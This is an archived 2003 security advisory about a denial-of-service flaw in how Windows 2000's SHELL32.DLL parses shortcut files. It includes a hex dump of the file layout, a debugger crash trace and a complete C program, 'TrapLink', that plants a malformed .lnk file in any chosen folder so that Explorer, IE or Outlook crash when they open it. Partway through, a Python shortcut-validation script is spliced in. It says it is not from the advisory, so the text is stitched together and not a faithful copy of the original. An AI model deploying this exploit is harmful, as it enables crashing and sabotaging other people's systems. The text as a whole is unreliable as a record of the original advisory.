
I2S-LAB-10-15-03.Shell32-Do.txt

Posted Dec 5, 2003
Authored by I2S-LaB | Site I2S-LaB.com

I2S LAB Security Advisory - A malicious attacker can utilize any type of media against the SHELL32.DLL library to cause a massive denial of service. Microsoft Windows 2000 versions SP4 and below are affected. Full research and exploit provided. The next service pack released will have this fixed.

tags | exploit, denial of service
systems | windows
SHA-256 | cda832a63a727038ccbcd93d3c2b509947c91a0f82ff179c79054ca5a7f486b9

###########################################################################################

~ I2S LAB Security Advisory ~

###########################################################################################
http://www.I2S-LAB.com

Date : 12 / 03 / 2003

Affected systems : Microsoft Windows 2000 SP4 and below

Vendor : http://www.microsoft.com

Issue : Attackers can turn a medium (directory, drive, mail, ...) into a remote bomb crashing any application
that tries to access it through the SHELL32.DLL library (Explorer, IE, Outlook).


Description
___________

SHELL32.DLL is a library which contains Windows system functions used to open web pages and documents and to
obtain information on file associations.

That library is used by most standard applications to browse directories in search of a specific file
(a perfect example being the File->Open menu command available in most applications).


Technical Details
_________________

As a user browses through his hard drive, Windows automatically analyses every file of the current directory,
so as to display the matching icon as well as file information.

When Windows must analyse a shortcut (*.lnk), the system determines the properties of the file the link points to
by parsing the shortcut's structure (see: The Windows Shortcut File Format at http://www.I2S-LAB.com/Papers/The_Windows_Shortcut_File_Format.pdf).

Here is the structure of a Windows link as we have mapped it out:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-------------------------------------------------------------------+
| Shortcut HEADER |
+-------------------------------------------------------------------+
00000000 4C00 0000 L... 'L' Magic value

00000004 0114 0200 .... GUID of shortcut files
00000008 0000 0000 ....
0000000C C000 0000 ....
00000010 0000 0046 ...F

00000014 8900 0000 .... Flag

00000018 2000 0000 ... File attribute

0000001C A0C3 D5A8 .... Time 1
00000020 478E C301 G...

00000024 A0C3 D5A8 .... Time 2
00000028 478E C301 G...

0000002C A0C3 D5A8 .... Time 3
00000030 478E C301 G...

00000034 0000 0000 .... File length (here 0 bytes)
00000038 0000 0000 .... Icon number (no icon for us)
0000003C 0100 0000 .... Normal window
00000040 0000 0000 .... shortcut (no)
00000044 0000 0000 .... unknown/reserved
00000048 0000 0000 .... unknown/reserved


+-------------------------------------------------------------------+
| Item Id List |
+-------------------------------------------------------------------+

0000004C 4600 F. Size of item id list

+-------------------------------------------------------------------+
| First item |
+-------------------------------------------------------------------+

0000004E 1400 .. Length of first item
00000050 1F50 .P ???
00000052 E04F D020 .O. File length
00000056 EA3A 6910 .:i. ???

+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+

0000005A A2D8 0800 2B30 309D 1900 2343 3A5C 0000 ....+00...#C:\..
0000006A 0000 0000 0000 0000 0000 0000 0000 0051 ...............Q
0000007A 8417 0032 0000 0000 0049 2F87 4B20 006B ...2.....I/.K .k
0000008A 7574 2E74 7874 0000 ut.txt..

+-------------------------------------------------------------------+
| vulnerable bytes |
+-------------------------------------------------------------------+

00000092 0000 0900 .... name length
00000096 2E00 ..

00000098 5C00 6B00 7500 7400 2E00 7400 7800 7400 \.k.u.t...t.x.t. name in wide chars


+-------------------------------------------------------------------+
| data... |
+-------------------------------------------------------------------+

000000A8 6000 0000 0300 00A0 5800 0000 0000 0000 `.......X.......
000000B8 6932 732D 7732 6B00 0000 0000 0000 0000 i2s-w2k.........
000000C8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000D8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
000000E8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
000000F8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
00000108 0000 0000 00 .....

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

If we modify the name length at offset 0x92, SHELL32.DLL raises an access violation,
because text is about to be written outside of the buffer allocated on the heap for this operation.
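The check a defender wants against this class of file is a parser that does not trust any length field it cannot reconcile with the bytes actually present. The following Python walker is an added example, not code from the advisory or from I2S-LAB: it follows the layout shown in the dump above (header, item id list, string data, extra data blocks) and reports every size field that overruns its container. The well-formed sample is constructed from the advisory's own hex dump; note that the item sizes 0x14 + 0x19 + 0x17 plus the list size 0x46 at 0x4C place the list's two-byte terminator exactly at 0x92, so the bytes the advisory modifies are the ones that close the item id list. The section names (LinkFlags, StringData, MS-SHLLINK flag bits) are an assumption about naming taken from Microsoft's later public specification, not terms the advisory uses.

```python
import struct

HEADER_SIZE = 0x4C
LNK_MAGIC = b"\x4c\x00\x00\x00"
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80  # LinkFlags bits
# StringData sections in file order; each is present only when its flag is set.
STRING_SECTIONS = ((0x04, "name"), (0x08, "relative path"), (0x10, "working dir"),
                   (0x20, "arguments"), (0x40, "icon location"))

# Constructed sample: the advisory's dump (target C:\kut.txt, relative path
# .\kut.txt, one 0x60-byte extra data block) with the item id list terminator
# at 0x92 intact. Sixteen bytes per line, starting at offset 0x00.
SAMPLE_LNK = bytes.fromhex(
    "4c0000000114020000000000c0000000"      # 'L' magic, shortcut GUID
    "000000468900000020000000a0c3d5a8"      # 0x14: flags 0x89, attributes, time 1
    "478ec301a0c3d5a8478ec301a0c3d5a8"
    "478ec301000000000000000001000000"
    "00000000000000000000000046001400"      # 0x4c: list size 0x46; 0x4e: item 0x14
    "1f50e04fd020ea3a6910a2d808002b30"
    "309d190023433a5c0000000000000000"      # 0x62: item 0x19 "C:\"
    "00000000000000000051841700320000"      # 0x7b: item 0x17 "kut.txt"
    "000000492f874b20006b75742e747874"
    "00000000" "09002e005c006b0075007400"   # 0x92: terminator; 0x94: 9 wide chars
    "2e0074007800740060000000030000a0"      # 0xa8: extra data block of 0x60 bytes
    "58000000000000006932732d77326b00"
    "00000000000000006ea1e9b21b236b46"
    "b8048e43f33856f00edceb90a1f8d711"
    "a41b00eeb000dac96ea1e9b21b236b46"
    "b8048e43f33856f00edceb90a1f8d711"
    "a41b00eeb000dac900000000"              # 0x108: terminal block
)


def _u16(data, pos):
    return struct.unpack_from("<H", data, pos)[0]


def _u32(data, pos):
    return struct.unpack_from("<I", data, pos)[0]


def check_lnk(data):
    """Return findings (empty list = every length field fits the bytes present)."""
    if len(data) < HEADER_SIZE or data[:4] != LNK_MAGIC:
        return ["header: too short or bad magic (expected 4C 00 00 00)"]
    findings, flags, pos = [], _u32(data, 0x14), HEADER_SIZE

    if flags & HAS_LINK_TARGET_ID_LIST:
        list_end = pos + 2 + (_u16(data, pos) if pos + 2 <= len(data) else 0)
        if list_end > len(data):
            return [f"item id list: declared end 0x{list_end:x} is past the file end 0x{len(data):x}"]
        pos, terminated = pos + 2, False
        while pos + 2 <= list_end:
            item_size = _u16(data, pos)          # counts the size field itself
            if item_size == 0:                   # terminal item id
                pos, terminated = pos + 2, True
                break
            if item_size < 2 or pos + item_size > list_end:
                findings.append(f"item at 0x{pos:x} claims 0x{item_size:x} bytes, "
                                f"only 0x{list_end - pos:x} remain in the list")
                break
            pos += item_size
        else:
            findings.append(f"item id list: no terminator before declared end 0x{list_end:x}")
        if terminated and pos != list_end:
            findings.append(f"item id list: terminator at 0x{pos - 2:x} precedes declared end 0x{list_end:x}")
        pos = list_end                           # resync on the declared size, keep checking

    if flags & HAS_LINK_INFO:
        size = _u32(data, pos) if pos + 4 <= len(data) else 0
        if size < 4 or pos + size > len(data):
            return findings + [f"link info at 0x{pos:x}: size 0x{size:x} overruns the file"]
        pos += size

    width = 2 if flags & IS_UNICODE else 1
    for bit, label in STRING_SECTIONS:
        if flags & bit:
            count = _u16(data, pos) if pos + 2 <= len(data) else None
            if count is None or pos + 2 + count * width > len(data):
                return findings + [f"{label} string at 0x{pos:x}: character count overruns the file"]
            pos += 2 + count * width

    while True:                                  # extra data blocks end with a size < 4
        size = _u32(data, pos) if pos + 4 <= len(data) else None
        if size is None or (size >= 4 and pos + size > len(data)):
            return findings + [f"extra data block at 0x{pos:x}: size field overruns the file"]
        pos += size if size >= 4 else 4
        if size < 4:
            break
    if pos != len(data):
        findings.append(f"0x{len(data) - pos:x} trailing bytes after the terminal block")
    return findings


if __name__ == "__main__":
    print("well-formed sample:", check_lnk(SAMPLE_LNK) or "consistent")
    trapped = bytearray(SAMPLE_LNK)
    trapped[0x92:0x94] = b"\xff\xff"             # the two bytes the advisory modifies
    print("terminator overwritten:", check_lnk(bytes(trapped)))
```

On the sample as dumped the walker returns no findings; on a copy whose terminator has been overwritten it reports the item at 0x92 whose declared size exceeds the two bytes left in the list, then resynchronises on the declared list size so later sections are still checked. A gateway or share scanner would quarantine on any non-empty result, which catches this file before SHELL32 ever copies the list.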


Demonstration
_____________

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>mkdir crash-test

C:\>TrapLink.exe c:\crash-test
################################
TrapLink SHELL32.dll DoS exploit
################################
By I2S-LAB Team.

http://www.I2S-LaB.com

c:\crash-test is now trapped with a malicious LNK file

C:\>start explorer.exe c:\crash-test


(618.408): Access violation - code c0000005 (!!! second chance !!!)

eax=0013ffe0 ebx=70c18871 ecx=00003ee0 edx=00012eba esi=0012a000 edi=00143318
eip=77583411 esp=03e5ea8c ebp=03e5eab8 iopl=0 nv up ei pl nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000213

*** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:\WINNT\system32\SHELL32.dll - SHELL32!Ordinal18+0x25:
77583411 f3a5 rep movsd ds:0012a000=???????? es:00143318=00000065


775833ff e89effffff call SHELL32!Ordinal196 (775833a2)
77583404 85c0 test eax,eax
77583406 7412 jz SHELL32!Ordinal18+0x2e (7758341a)
77583408 8bcf mov ecx,edi
7758340a 8bf8 mov edi,eax
7758340c 8bd1 mov edx,ecx
7758340e c1e902 shr ecx,0x2
77583411 f3a5 rep movsd ds:000f8000=???????? es:00107040=00000000 <-- crash
77583413 8bca mov ecx,edx
77583415 83e103 and ecx,0x3
77583418 f3a4 rep movsb
7758341a 5f pop edi
7758341b 5e pop esi
7758341c c20400 ret 0x4


Exploits
________

/****************************************
* TrapLink for SHELL32.DLL DoS Exploit *
****************************************
Discovered & coded by I2S-LaB

________________________________________

URL : http://www.I2S-LaB.com
MAIL: contact[at]I2S-LaB.com
________________________________________

*****************************************/

#include <windows.h>
#include <stdio.h>

int main (int argc, char *argv[])
{
    HANDLE TrapFile;
    DWORD NumberOfBytesWritten;

    /* Raw image of the malicious shortcut laid out in the hex dump above;
       offset 0x92 holds the modified bytes described in the advisory. */
    unsigned char LnkCrash[] =

    "\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00"
    "\x00\x00\x00\x46\x89\x00\x00\x00\x20\x00\x00\x00\xA0\xC3\xD5\xA8"
    "\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8"
    "\x47\x8E\xC3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x00\x14\x00"
    "\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30"
    "\x30\x9D\x19\x00\x23\x43\x3A\x5C\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x84\x17\x00\x32\x00\x00"
    "\x00\x00\x00\x49\x2F\x87\x4B\x20\x00\x6B\x75\x74\x2E\x74\x78\x74"
    "\x00\x00\xFF\xFF\x09\x00\x2E\x00\x5C\x00\x6B\x00\x75\x00\x74\x00"
    "\x2E\x00\x74\x00\x78\x00\x74\x00\x60\x00\x00\x00\x03\x00\x00\xA0"
    "\x58\x00\x00\x00\x00\x00\x00\x00\x69\x32\x73\x2D\x77\x32\x6B\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
    "\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
    "\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
    "\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
    "\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x00\x00\x00\x00";

    printf ("################################\n"
            "TrapLink SHELL32.dll DoS exploit\n"
            "################################\n"
            "By I2S-LAB Team.\n\n"
            "http://www.I2S-LaB.com\n\n" );

    if (argc < 2)
    {
        printf ("Usage : %s <path to trap>\n", argv[0]);
        return 1;
    }

    if ( !SetCurrentDirectoryA(argv[1]) )
    {
        printf ("Error : %s is not a valid directory to trap\n", argv[1] );
        return 1;
    }

    TrapFile = CreateFileA("I2S-Crash.lnk",
                           GENERIC_WRITE, 0,
                           NULL, CREATE_ALWAYS,
                           FILE_ATTRIBUTE_NORMAL, NULL );

    if (TrapFile == INVALID_HANDLE_VALUE)
    {
        printf ("Error : cannot create malicious file.\n");
        return 1;
    }

    /* sizeof includes the string's terminating NUL, so one extra zero byte
       follows the terminal block; it does not change the result. */
    if ( !WriteFile (TrapFile, LnkCrash, sizeof (LnkCrash), &NumberOfBytesWritten, NULL) )
        printf ("Error : cannot write malicious file.\n");
    else
        printf ("%s is now trapped with a malicious LNK file\n", argv[1] );

    CloseHandle (TrapFile);
    return 0;
}


Solution
________

Microsoft was notified on 11/17/2003 and has agreed to fix this as part of the next service pack.

Credits
_______


Aurélien BOUDOUX - aurelien[at]I2S-LaB.com
Fred CHAVEROT - fred[at]I2S-LaB.com